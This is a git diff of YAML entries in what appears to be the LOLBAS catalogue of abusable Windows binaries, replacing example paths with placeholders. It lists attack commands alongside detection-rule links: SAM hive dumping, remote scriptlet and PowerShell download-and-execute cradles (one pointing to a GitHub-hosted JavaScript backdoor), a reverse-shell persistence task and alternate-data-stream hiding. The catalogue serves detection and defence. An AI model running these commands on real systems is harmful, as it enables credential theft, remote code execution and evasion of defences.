  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml
  - Elastic: https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html
--- a/yml/OSBinaries/Reg.yml
+++ b/yml/OSBinaries/Reg.yml
@ -1,17 +1,17 @@
 ---
 Name: Reg.exe
 Description: Used to manipulate the registry
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
+  - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg {PATH_ABSOLUTE}:evilreg.reg
    Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
    Usecase: Hide/plant registry information in Alternate data stream for later use
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: reg save HKLM\SECURITY c:\test\security.bak && reg save HKLM\SYSTEM c:\test\system.bak && reg save HKLM\SAM c:\test\sam.bak
+  - Command: reg save HKLM\SECURITY {PATH_ABSOLUTE:.1.bak} && reg save HKLM\SYSTEM {PATH_ABSOLUTE:.2.bak} && reg save HKLM\SAM {PATH_ABSOLUTE:.3.bak}
    Description: Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material
    Usecase: Dump credentials from the Security Account Manager (SAM)
    Category: Credentials
@ -21,8 +21,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\reg.exe
  - Path: C:\Windows\SysWOW64\reg.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml
--- a/yml/OSBinaries/Regasm.yml
+++ b/yml/OSBinaries/Regasm.yml
@ -1,11 +1,11 @@
 ---
 Name: Regasm.exe
 Description: Part of .NET
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: regasm.exe AllTheThingsx64.dll
+  - Command: regasm.exe {PATH:.dll}
-    Description: Loads the target .Net DLL file and executes the RegisterClass function.
+    Description: Loads the target .NET DLL file and executes the RegisterClass function.
    Usecase: Execute code and bypass Application whitelisting
    Category: AWL Bypass
    Privileges: Local Admin
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL (.NET)
-  - Command: regasm.exe /U AllTheThingsx64.dll
+  - Command: regasm.exe /U {PATH:.dll}
    Description: Loads the target .DLL file and executes the UnRegisterClass function.
    Usecase: Execute code and bypass Application whitelisting
    Category: Execute
--- a/yml/OSBinaries/Regedit.yml
+++ b/yml/OSBinaries/Regedit.yml
@ -1,17 +1,17 @@
 ---
 Name: Regedit.exe
 Description: Used by Windows to manipulate registry
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
+  - Command: regedit /E {PATH_ABSOLUTE}:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
    Description: Export the target Registry key to the specified .REG file.
    Usecase: Hide registry data in alternate data stream
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: regedit C:\ads\file.txt:regfile.reg
+  - Command: regedit {PATH_ABSOLUTE}:regfile.reg
    Description: Import the target .REG file into the Registry.
    Usecase: Import hidden registry data from alternate data stream
    Category: ADS
@ -20,8 +20,6 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
  - Path: C:\Windows\regedit.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml
  - IOC: regedit.exe reading and writing to alternate data stream
--- a/yml/OSBinaries/Regini.yml
+++ b/yml/OSBinaries/Regini.yml
@ -1,10 +1,10 @@
 ---
 Name: Regini.exe
 Description: Used to manipulate the registry
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2020-07-03
 Commands:
-  - Command: regini.exe newfile.txt:hidden.ini
+  - Command: regini.exe {PATH}:hidden.ini
    Description: Write registry keys from data inside the Alternate data stream.
    Usecase: Write to registry
    Category: ADS
@ -14,8 +14,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\regini.exe
  - Path: C:\Windows\SysWOW64\regini.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml
--- a/yml/OSBinaries/Register-cimprovider.yml
+++ b/yml/OSBinaries/Register-cimprovider.yml
@ -1,10 +1,10 @@
 ---
 Name: Register-cimprovider.exe
 Description: Used to register new wmi providers
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: Register-cimprovider -path "C:\folder\evil.dll"
+  - Command: Register-cimprovider -path {PATH_ABSOLUTE:.dll}
    Description: Load the target .DLL.
    Usecase: Execute code within dll file
    Category: Execute
@ -16,8 +16,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\Register-cimprovider.exe
  - Path: C:\Windows\SysWOW64\Register-cimprovider.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml
  - IOC: Register-cimprovider.exe execution and cmdline DLL load may be supsicious
--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
@ -1,11 +1,11 @@
 ---
 Name: Regsvcs.exe
 Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: regsvcs.exe AllTheThingsx64.dll
+  - Command: regsvcs.exe {PATH:.dll}
-    Description: Loads the target .Net DLL file and executes the RegisterClass function.
+    Description: Loads the target .NET DLL file and executes the RegisterClass function.
    Usecase: Execute dll file and bypass Application whitelisting
    Category: Execute
    Privileges: User
@ -13,8 +13,8 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL (.NET)
-  - Command: regsvcs.exe AllTheThingsx64.dll
+  - Command: regsvcs.exe {PATH:.dll}
-    Description: Loads the target .Net DLL file and executes the RegisterClass function.
+    Description: Loads the target .NET DLL file and executes the RegisterClass function.
    Usecase: Execute dll file and bypass Application whitelisting
    Category: AWL Bypass
    Privileges: Local Admin
--- a/yml/OSBinaries/Regsvr32.yml
+++ b/yml/OSBinaries/Regsvr32.yml
@ -1,10 +1,10 @@
 ---
 Name: Regsvr32.exe
 Description: Used by Windows to register dlls
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
+  - Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll
    Description: Execute the specified remote .SCT script with scrobj.dll.
    Usecase: Execute code from remote scriptlet, bypass Application whitelisting
    Category: AWL Bypass
@ -14,7 +14,7 @@ Commands:
    Tags:
      - Execute: SCT
      - Execute: Remote
-  - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
+  - Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll
    Description: Execute the specified local .SCT script with scrobj.dll.
    Usecase: Execute code from scriptlet, bypass Application whitelisting
    Category: AWL Bypass
@ -23,7 +23,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: SCT
-  - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
+  - Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll
    Description: Execute the specified remote .SCT script with scrobj.dll.
    Usecase: Execute code from remote scriptlet, bypass Application whitelisting
    Category: Execute
@ -33,7 +33,7 @@ Commands:
    Tags:
      - Execute: SCT
      - Execute: Remote
-  - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
+  - Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll
    Description: Execute the specified local .SCT script with scrobj.dll.
    Usecase: Execute code from scriptlet, bypass Application whitelisting
    Category: Execute
--- a/yml/OSBinaries/Replace.yml
+++ b/yml/OSBinaries/Replace.yml
@ -1,18 +1,18 @@
 ---
 Name: Replace.exe
 Description: Used to replace file with another file
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: replace.exe C:\Source\File.cab C:\Destination /A
+  - Command: replace.exe {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE:folder} /A
-    Description: Copy file.cab to destination
+    Description: Copy .cab file to destination
    Usecase: Copy files
    Category: Copy
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
+  - Command: replace.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:folder} /A
-    Description: Download/Copy bar.exe to outdir
+    Description: Download/Copy executable to specified folder
    Usecase: Download file
    Category: Download
    Privileges: User
@ -21,8 +21,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\replace.exe
  - Path: C:\Windows\SysWOW64\replace.exe
 Code_Sample:
  - Code:
 Detection:
  - IOC: Replace.exe retrieving files from remote server
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml
--- a/yml/OSBinaries/Rpcping.yml
+++ b/yml/OSBinaries/Rpcping.yml
@ -1,7 +1,7 @@
 ---
 Name: Rpcping.exe
 Description: Used to verify rpc connection
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
  - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
@ -21,8 +21,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\rpcping.exe
  - Path: C:\Windows\SysWOW64\rpcping.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml
 Resources:
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@ -1,20 +1,20 @@
 ---
 Name: Rundll32.exe
 Description: Used by Windows to execute dll files
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: rundll32.exe AllTheThingsx64,EntryPoint
+  - Command: rundll32.exe {PATH},EntryPoint
-    Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
+    Description: First part should be a DLL file (any extension accepted), EntryPoint should be the name of the entry point in the DLL file to execute.
-    Usecase: Execute dll file
+    Usecase: Execute DLL file
    Category: Execute
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
-  - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
+  - Command: rundll32.exe {PATH_SMB:.dll},EntryPoint
-    Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
+    Description: Execute a DLL from an SMB share. EntryPoint is the name of the entry point in the DLL file to execute.
    Usecase: Execute DLL from SMB share.
    Category: Execute
    Privileges: User
@ -23,16 +23,7 @@ Commands:
    Tags:
      - Execute: DLL
      - Execute: Remote
-  - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
+  - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:{REMOTEURL}")
    Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
    Usecase: Proxy execution
    Category: Execute
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: JScript
  - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
    Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
    Usecase: Execute code from Internet
    Category: Execute
@ -41,7 +32,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: JScript
-  - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
+  - Command: rundll32 "{PATH}:ADSDLL.dll",DllMain
    Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
    Usecase: Execute code from alternate data stream
    Category: ADS
--- a/yml/OSBinaries/Runexehelper.yml
+++ b/yml/OSBinaries/Runexehelper.yml
@ -4,7 +4,7 @@ Description: Launcher process
 Author: Grzegorz Tworek
 Created: 2022-12-13
 Commands:
-  - Command: runexehelper.exe c:\windows\system32\calc.exe
+  - Command: runexehelper.exe {PATH_ABSOLUTE:.exe}
    Description: 'Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.'
    Usecase: Executes arbitrary code
    Category: Execute
--- a/yml/OSBinaries/Runonce.yml
+++ b/yml/OSBinaries/Runonce.yml
@ -1,11 +1,11 @@
 ---
 Name: Runonce.exe
 Description: Executes a Run Once Task that has been configured in the registry
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
  - Command: Runonce.exe /AlternateShellStartup
-    Description: Executes a Run Once Task that has been configured in the registry
+    Description: Executes a Run Once Task that has been configured in the registry.
    Usecase: Persistence, bypassing defensive counter measures
    Category: Execute
    Privileges: Administrator
@ -16,8 +16,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\runonce.exe
  - Path: C:\Windows\SysWOW64\runonce.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml
--- a/yml/OSBinaries/Runscripthelper.yml
+++ b/yml/OSBinaries/Runscripthelper.yml
@ -1,11 +1,11 @@
 ---
 Name: Runscripthelper.exe
 Description: Execute target PowerShell script
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
+  - Command: runscripthelper.exe surfacecheck \\?\{PATH_ABSOLUTE:.txt} {PATH_ABSOLUTE:folder}
-    Description: Execute the PowerShell script named test.txt
+    Description: Execute the PowerShell script with .txt extension
    Usecase: Bypass constrained language mode and execute Powershell script
    Category: Execute
    Privileges: User
@ -16,8 +16,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
  - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
--- a/yml/OSBinaries/Sc.yml
+++ b/yml/OSBinaries/Sc.yml
@ -1,7 +1,7 @@
 ---
 Name: Sc.exe
 Description: Used by Windows to manage services
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
  - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
-  - Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>
+  - Command: sc config {ExistingServiceName} binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start {ExistingServiceName}
    Description: Modifies an existing service and executes the file stored in the ADS.
    Usecase: Execute binary file hidden inside an alternate data stream
    Category: ADS
@ -25,8 +25,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\sc.exe
  - Path: C:\Windows\SysWOW64\sc.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml
--- a/yml/OSBinaries/Schtasks.yml
+++ b/yml/OSBinaries/Schtasks.yml
@ -1,10 +1,10 @@
 ---
 Name: Schtasks.exe
 Description: Schedule periodic tasks
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
+  - Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr "{CMD}"
    Description: Create a recurring task to execute every minute.
    Usecase: Create a recurring task to keep reverse shell session(s) alive
    Category: Execute
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
-  - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
+  - Command: schtasks /create /s targetmachine /tn "MyTask" /tr "{CMD}" /sc daily
    Description: Create a scheduled task on a remote computer for persistence/lateral movement
    Usecase: Create a remote task to run daily relative to the the time of creation
    Category: Execute
@ -25,8 +25,6 @@ Commands:
 Full_Path:
  - Path: c:\windows\system32\schtasks.exe
  - Path: c:\windows\syswow64\schtasks.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml
@ -34,6 +32,3 @@ Detection:
  - IOC: Suspicious task creation events
 Resources:
  - Link: https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/
 Acknowledgement:
  - Person:
    Handle:
--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@ -1,11 +1,11 @@
 ---
 Name: Scriptrunner.exe
 Description: Execute binary through proxy binary to evade defensive counter measures
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: Scriptrunner.exe -appvscript calc.exe
+  - Command: Scriptrunner.exe -appvscript {PATH:.exe}
-    Description: Executes calc.exe
+    Description: Executes executable
    Usecase: Execute binary through proxy binary to evade defensive counter measures
    Category: Execute
    Privileges: User
@ -13,8 +13,8 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
-  - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
+  - Command: ScriptRunner.exe -appvscript {PATH_SMB:.cmd}
-    Description: Executes calc.cmd from remote server
+    Description: Executes cmd file from remote server
    Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
    Category: Execute
    Privileges: User
@ -26,8 +26,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\scriptrunner.exe
  - Path: C:\Windows\SysWOW64\scriptrunner.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml
  - IOC: Scriptrunner.exe should not be in use unless App-v is deployed
--- a/yml/OSBinaries/SettingSyncHost.yml
+++ b/yml/OSBinaries/SettingSyncHost.yml
@ -1,10 +1,10 @@
 ---
 Name: SettingSyncHost.exe
 Description: Host Process for Setting Synchronization
-Author: 'Elliot Killick'
+Author: Elliot Killick
 Created: 2021-08-26
 Commands:
-  - Command: SettingSyncHost -LoadAndRunDiagScript anything
+  - Command: SettingSyncHost -LoadAndRunDiagScript {PATH:.exe}
    Description: Execute file specified in %COMSPEC%
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
    Category: Execute
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: EXE
-  - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
+  - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab {PATH:.bat}
    Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.
    Category: Execute
--- a/yml/OSBinaries/Ssh.yml
+++ b/yml/OSBinaries/Ssh.yml
@ -1,11 +1,11 @@
 ---
 Name: ssh.exe
 Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.
-Author: 'Akshat Pradhan'
+Author: Akshat Pradhan
-Created: '2021-11-08'
+Created: 2021-11-08
 Commands:
-  - Command: ssh localhost calc.exe
+  - Command: ssh localhost "{CMD}"
-    Description: Execute calc.exe on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.
+    Description: Executes specified command on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.
    Usecase: Execute specified command, can be used for defense evasion.
    Category: Execute
    Privileges: User
@ -13,8 +13,8 @@ Commands:
    OperatingSystem: Windows 10 1809, Windows Server 2019
    Tags:
      - Execute: CMD
-  - Command: ssh -o ProxyCommand=calc.exe .
+  - Command: ssh -o ProxyCommand="{CMD}" .
-    Description: Executes calc.exe from ssh.exe
+    Description: Executes specified command from ssh.exe
    Usecase: Performs execution of specified file, can be used as a defensive evasion.
    Category: Execute
    Privileges: User
--- a/yml/OSBinaries/Syncappvpublishingserver.yml
+++ b/yml/OSBinaries/Syncappvpublishingserver.yml
@ -1,10 +1,10 @@
 ---
 Name: SyncAppvPublishingServer.exe
 Description: Used by App-v to get App-v server lists
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
+  - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX"
    Description: Example command on how inject Powershell code into the process
    Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures
    Category: Execute
@ -16,8 +16,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\SyncAppvPublishingServer.exe
  - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml
--- a/yml/OSBinaries/Tar.yml
+++ b/yml/OSBinaries/Tar.yml
@ -1,10 +1,10 @@
 ---
 Name: Tar.exe
 Description: Used by Windows to extract and create archives.
-Author: 'Brian Lucero'
+Author: Brian Lucero
 Created: 2023-01-30
 Commands:
-  - Command: tar -cf compressedfilename:ads C:\folder\file
+  - Command: tar -cf {PATH}:ads {PATH_ABSOLUTE:folder}
    Description: Compress one or more files to an alternate data stream (ADS).
    Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism
    Category: ADS
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Type: Compression
-  - Command: tar -xf compressedfilename:ads
+  - Command: tar -xf {PATH}:ads
    Description: Decompress a compressed file from an alternate data stream (ADS).
    Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism
    Category: ADS
@ -22,8 +22,8 @@ Commands:
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Type: Compression
-  - Command: tar -xf \\host1\archive.tar
+  - Command: tar -xf {PATH_SMB:.tar}
-    Description: Extracts archive.tar from the remote (internal) host (host1) to the current host.
+    Description: Extracts archive.tar from the remote (internal) host to the current host.
    Usecase: Copy files
    Category: Copy
    Privileges: User
--- a/yml/OSBinaries/Ttdinject.yml
+++ b/yml/OSBinaries/Ttdinject.yml
@ -1,11 +1,11 @@
 ---
 Name: Ttdinject.exe
 Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
-Author: 'Maxime Nadeau'
+Author: Maxime Nadeau
 Created: 2020-05-12
 Commands:
-  - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
+  - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "{PATH:.exe}"
-    Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
+    Description: Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
    Usecase: Spawn process using other binary
    Category: Execute
    Privileges: Administrator
@ -13,8 +13,8 @@ Commands:
    OperatingSystem: Windows 10 2004 and above, Windows 11
    Tags:
      - Execute: EXE
-  - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
+  - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "{PATH:.exe}"
-    Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
+    Description: Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
    Usecase: Spawn process using other binary
    Category: Execute
    Privileges: Administrator
@ -25,8 +25,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\ttdinject.exe
  - Path: C:\Windows\Syswow64\ttdinject.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml
--- a/yml/OSBinaries/Tttracer.yml
+++ b/yml/OSBinaries/Tttracer.yml
@ -1,11 +1,11 @@
 ---
 Name: Tttracer.exe
 Description: Used by Windows 1809 and newer to Debug Time Travel
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2019-11-05
 Commands:
-  - Command: tttracer.exe C:\windows\system32\calc.exe
+  - Command: tttracer.exe {PATH_ABSOLUTE:.exe}
-    Description: Execute calc using tttracer.exe. Requires administrator privileges
+    Description: Execute specified executable from tttracer.exe. Requires administrator privileges.
    Usecase: Spawn process using other binary
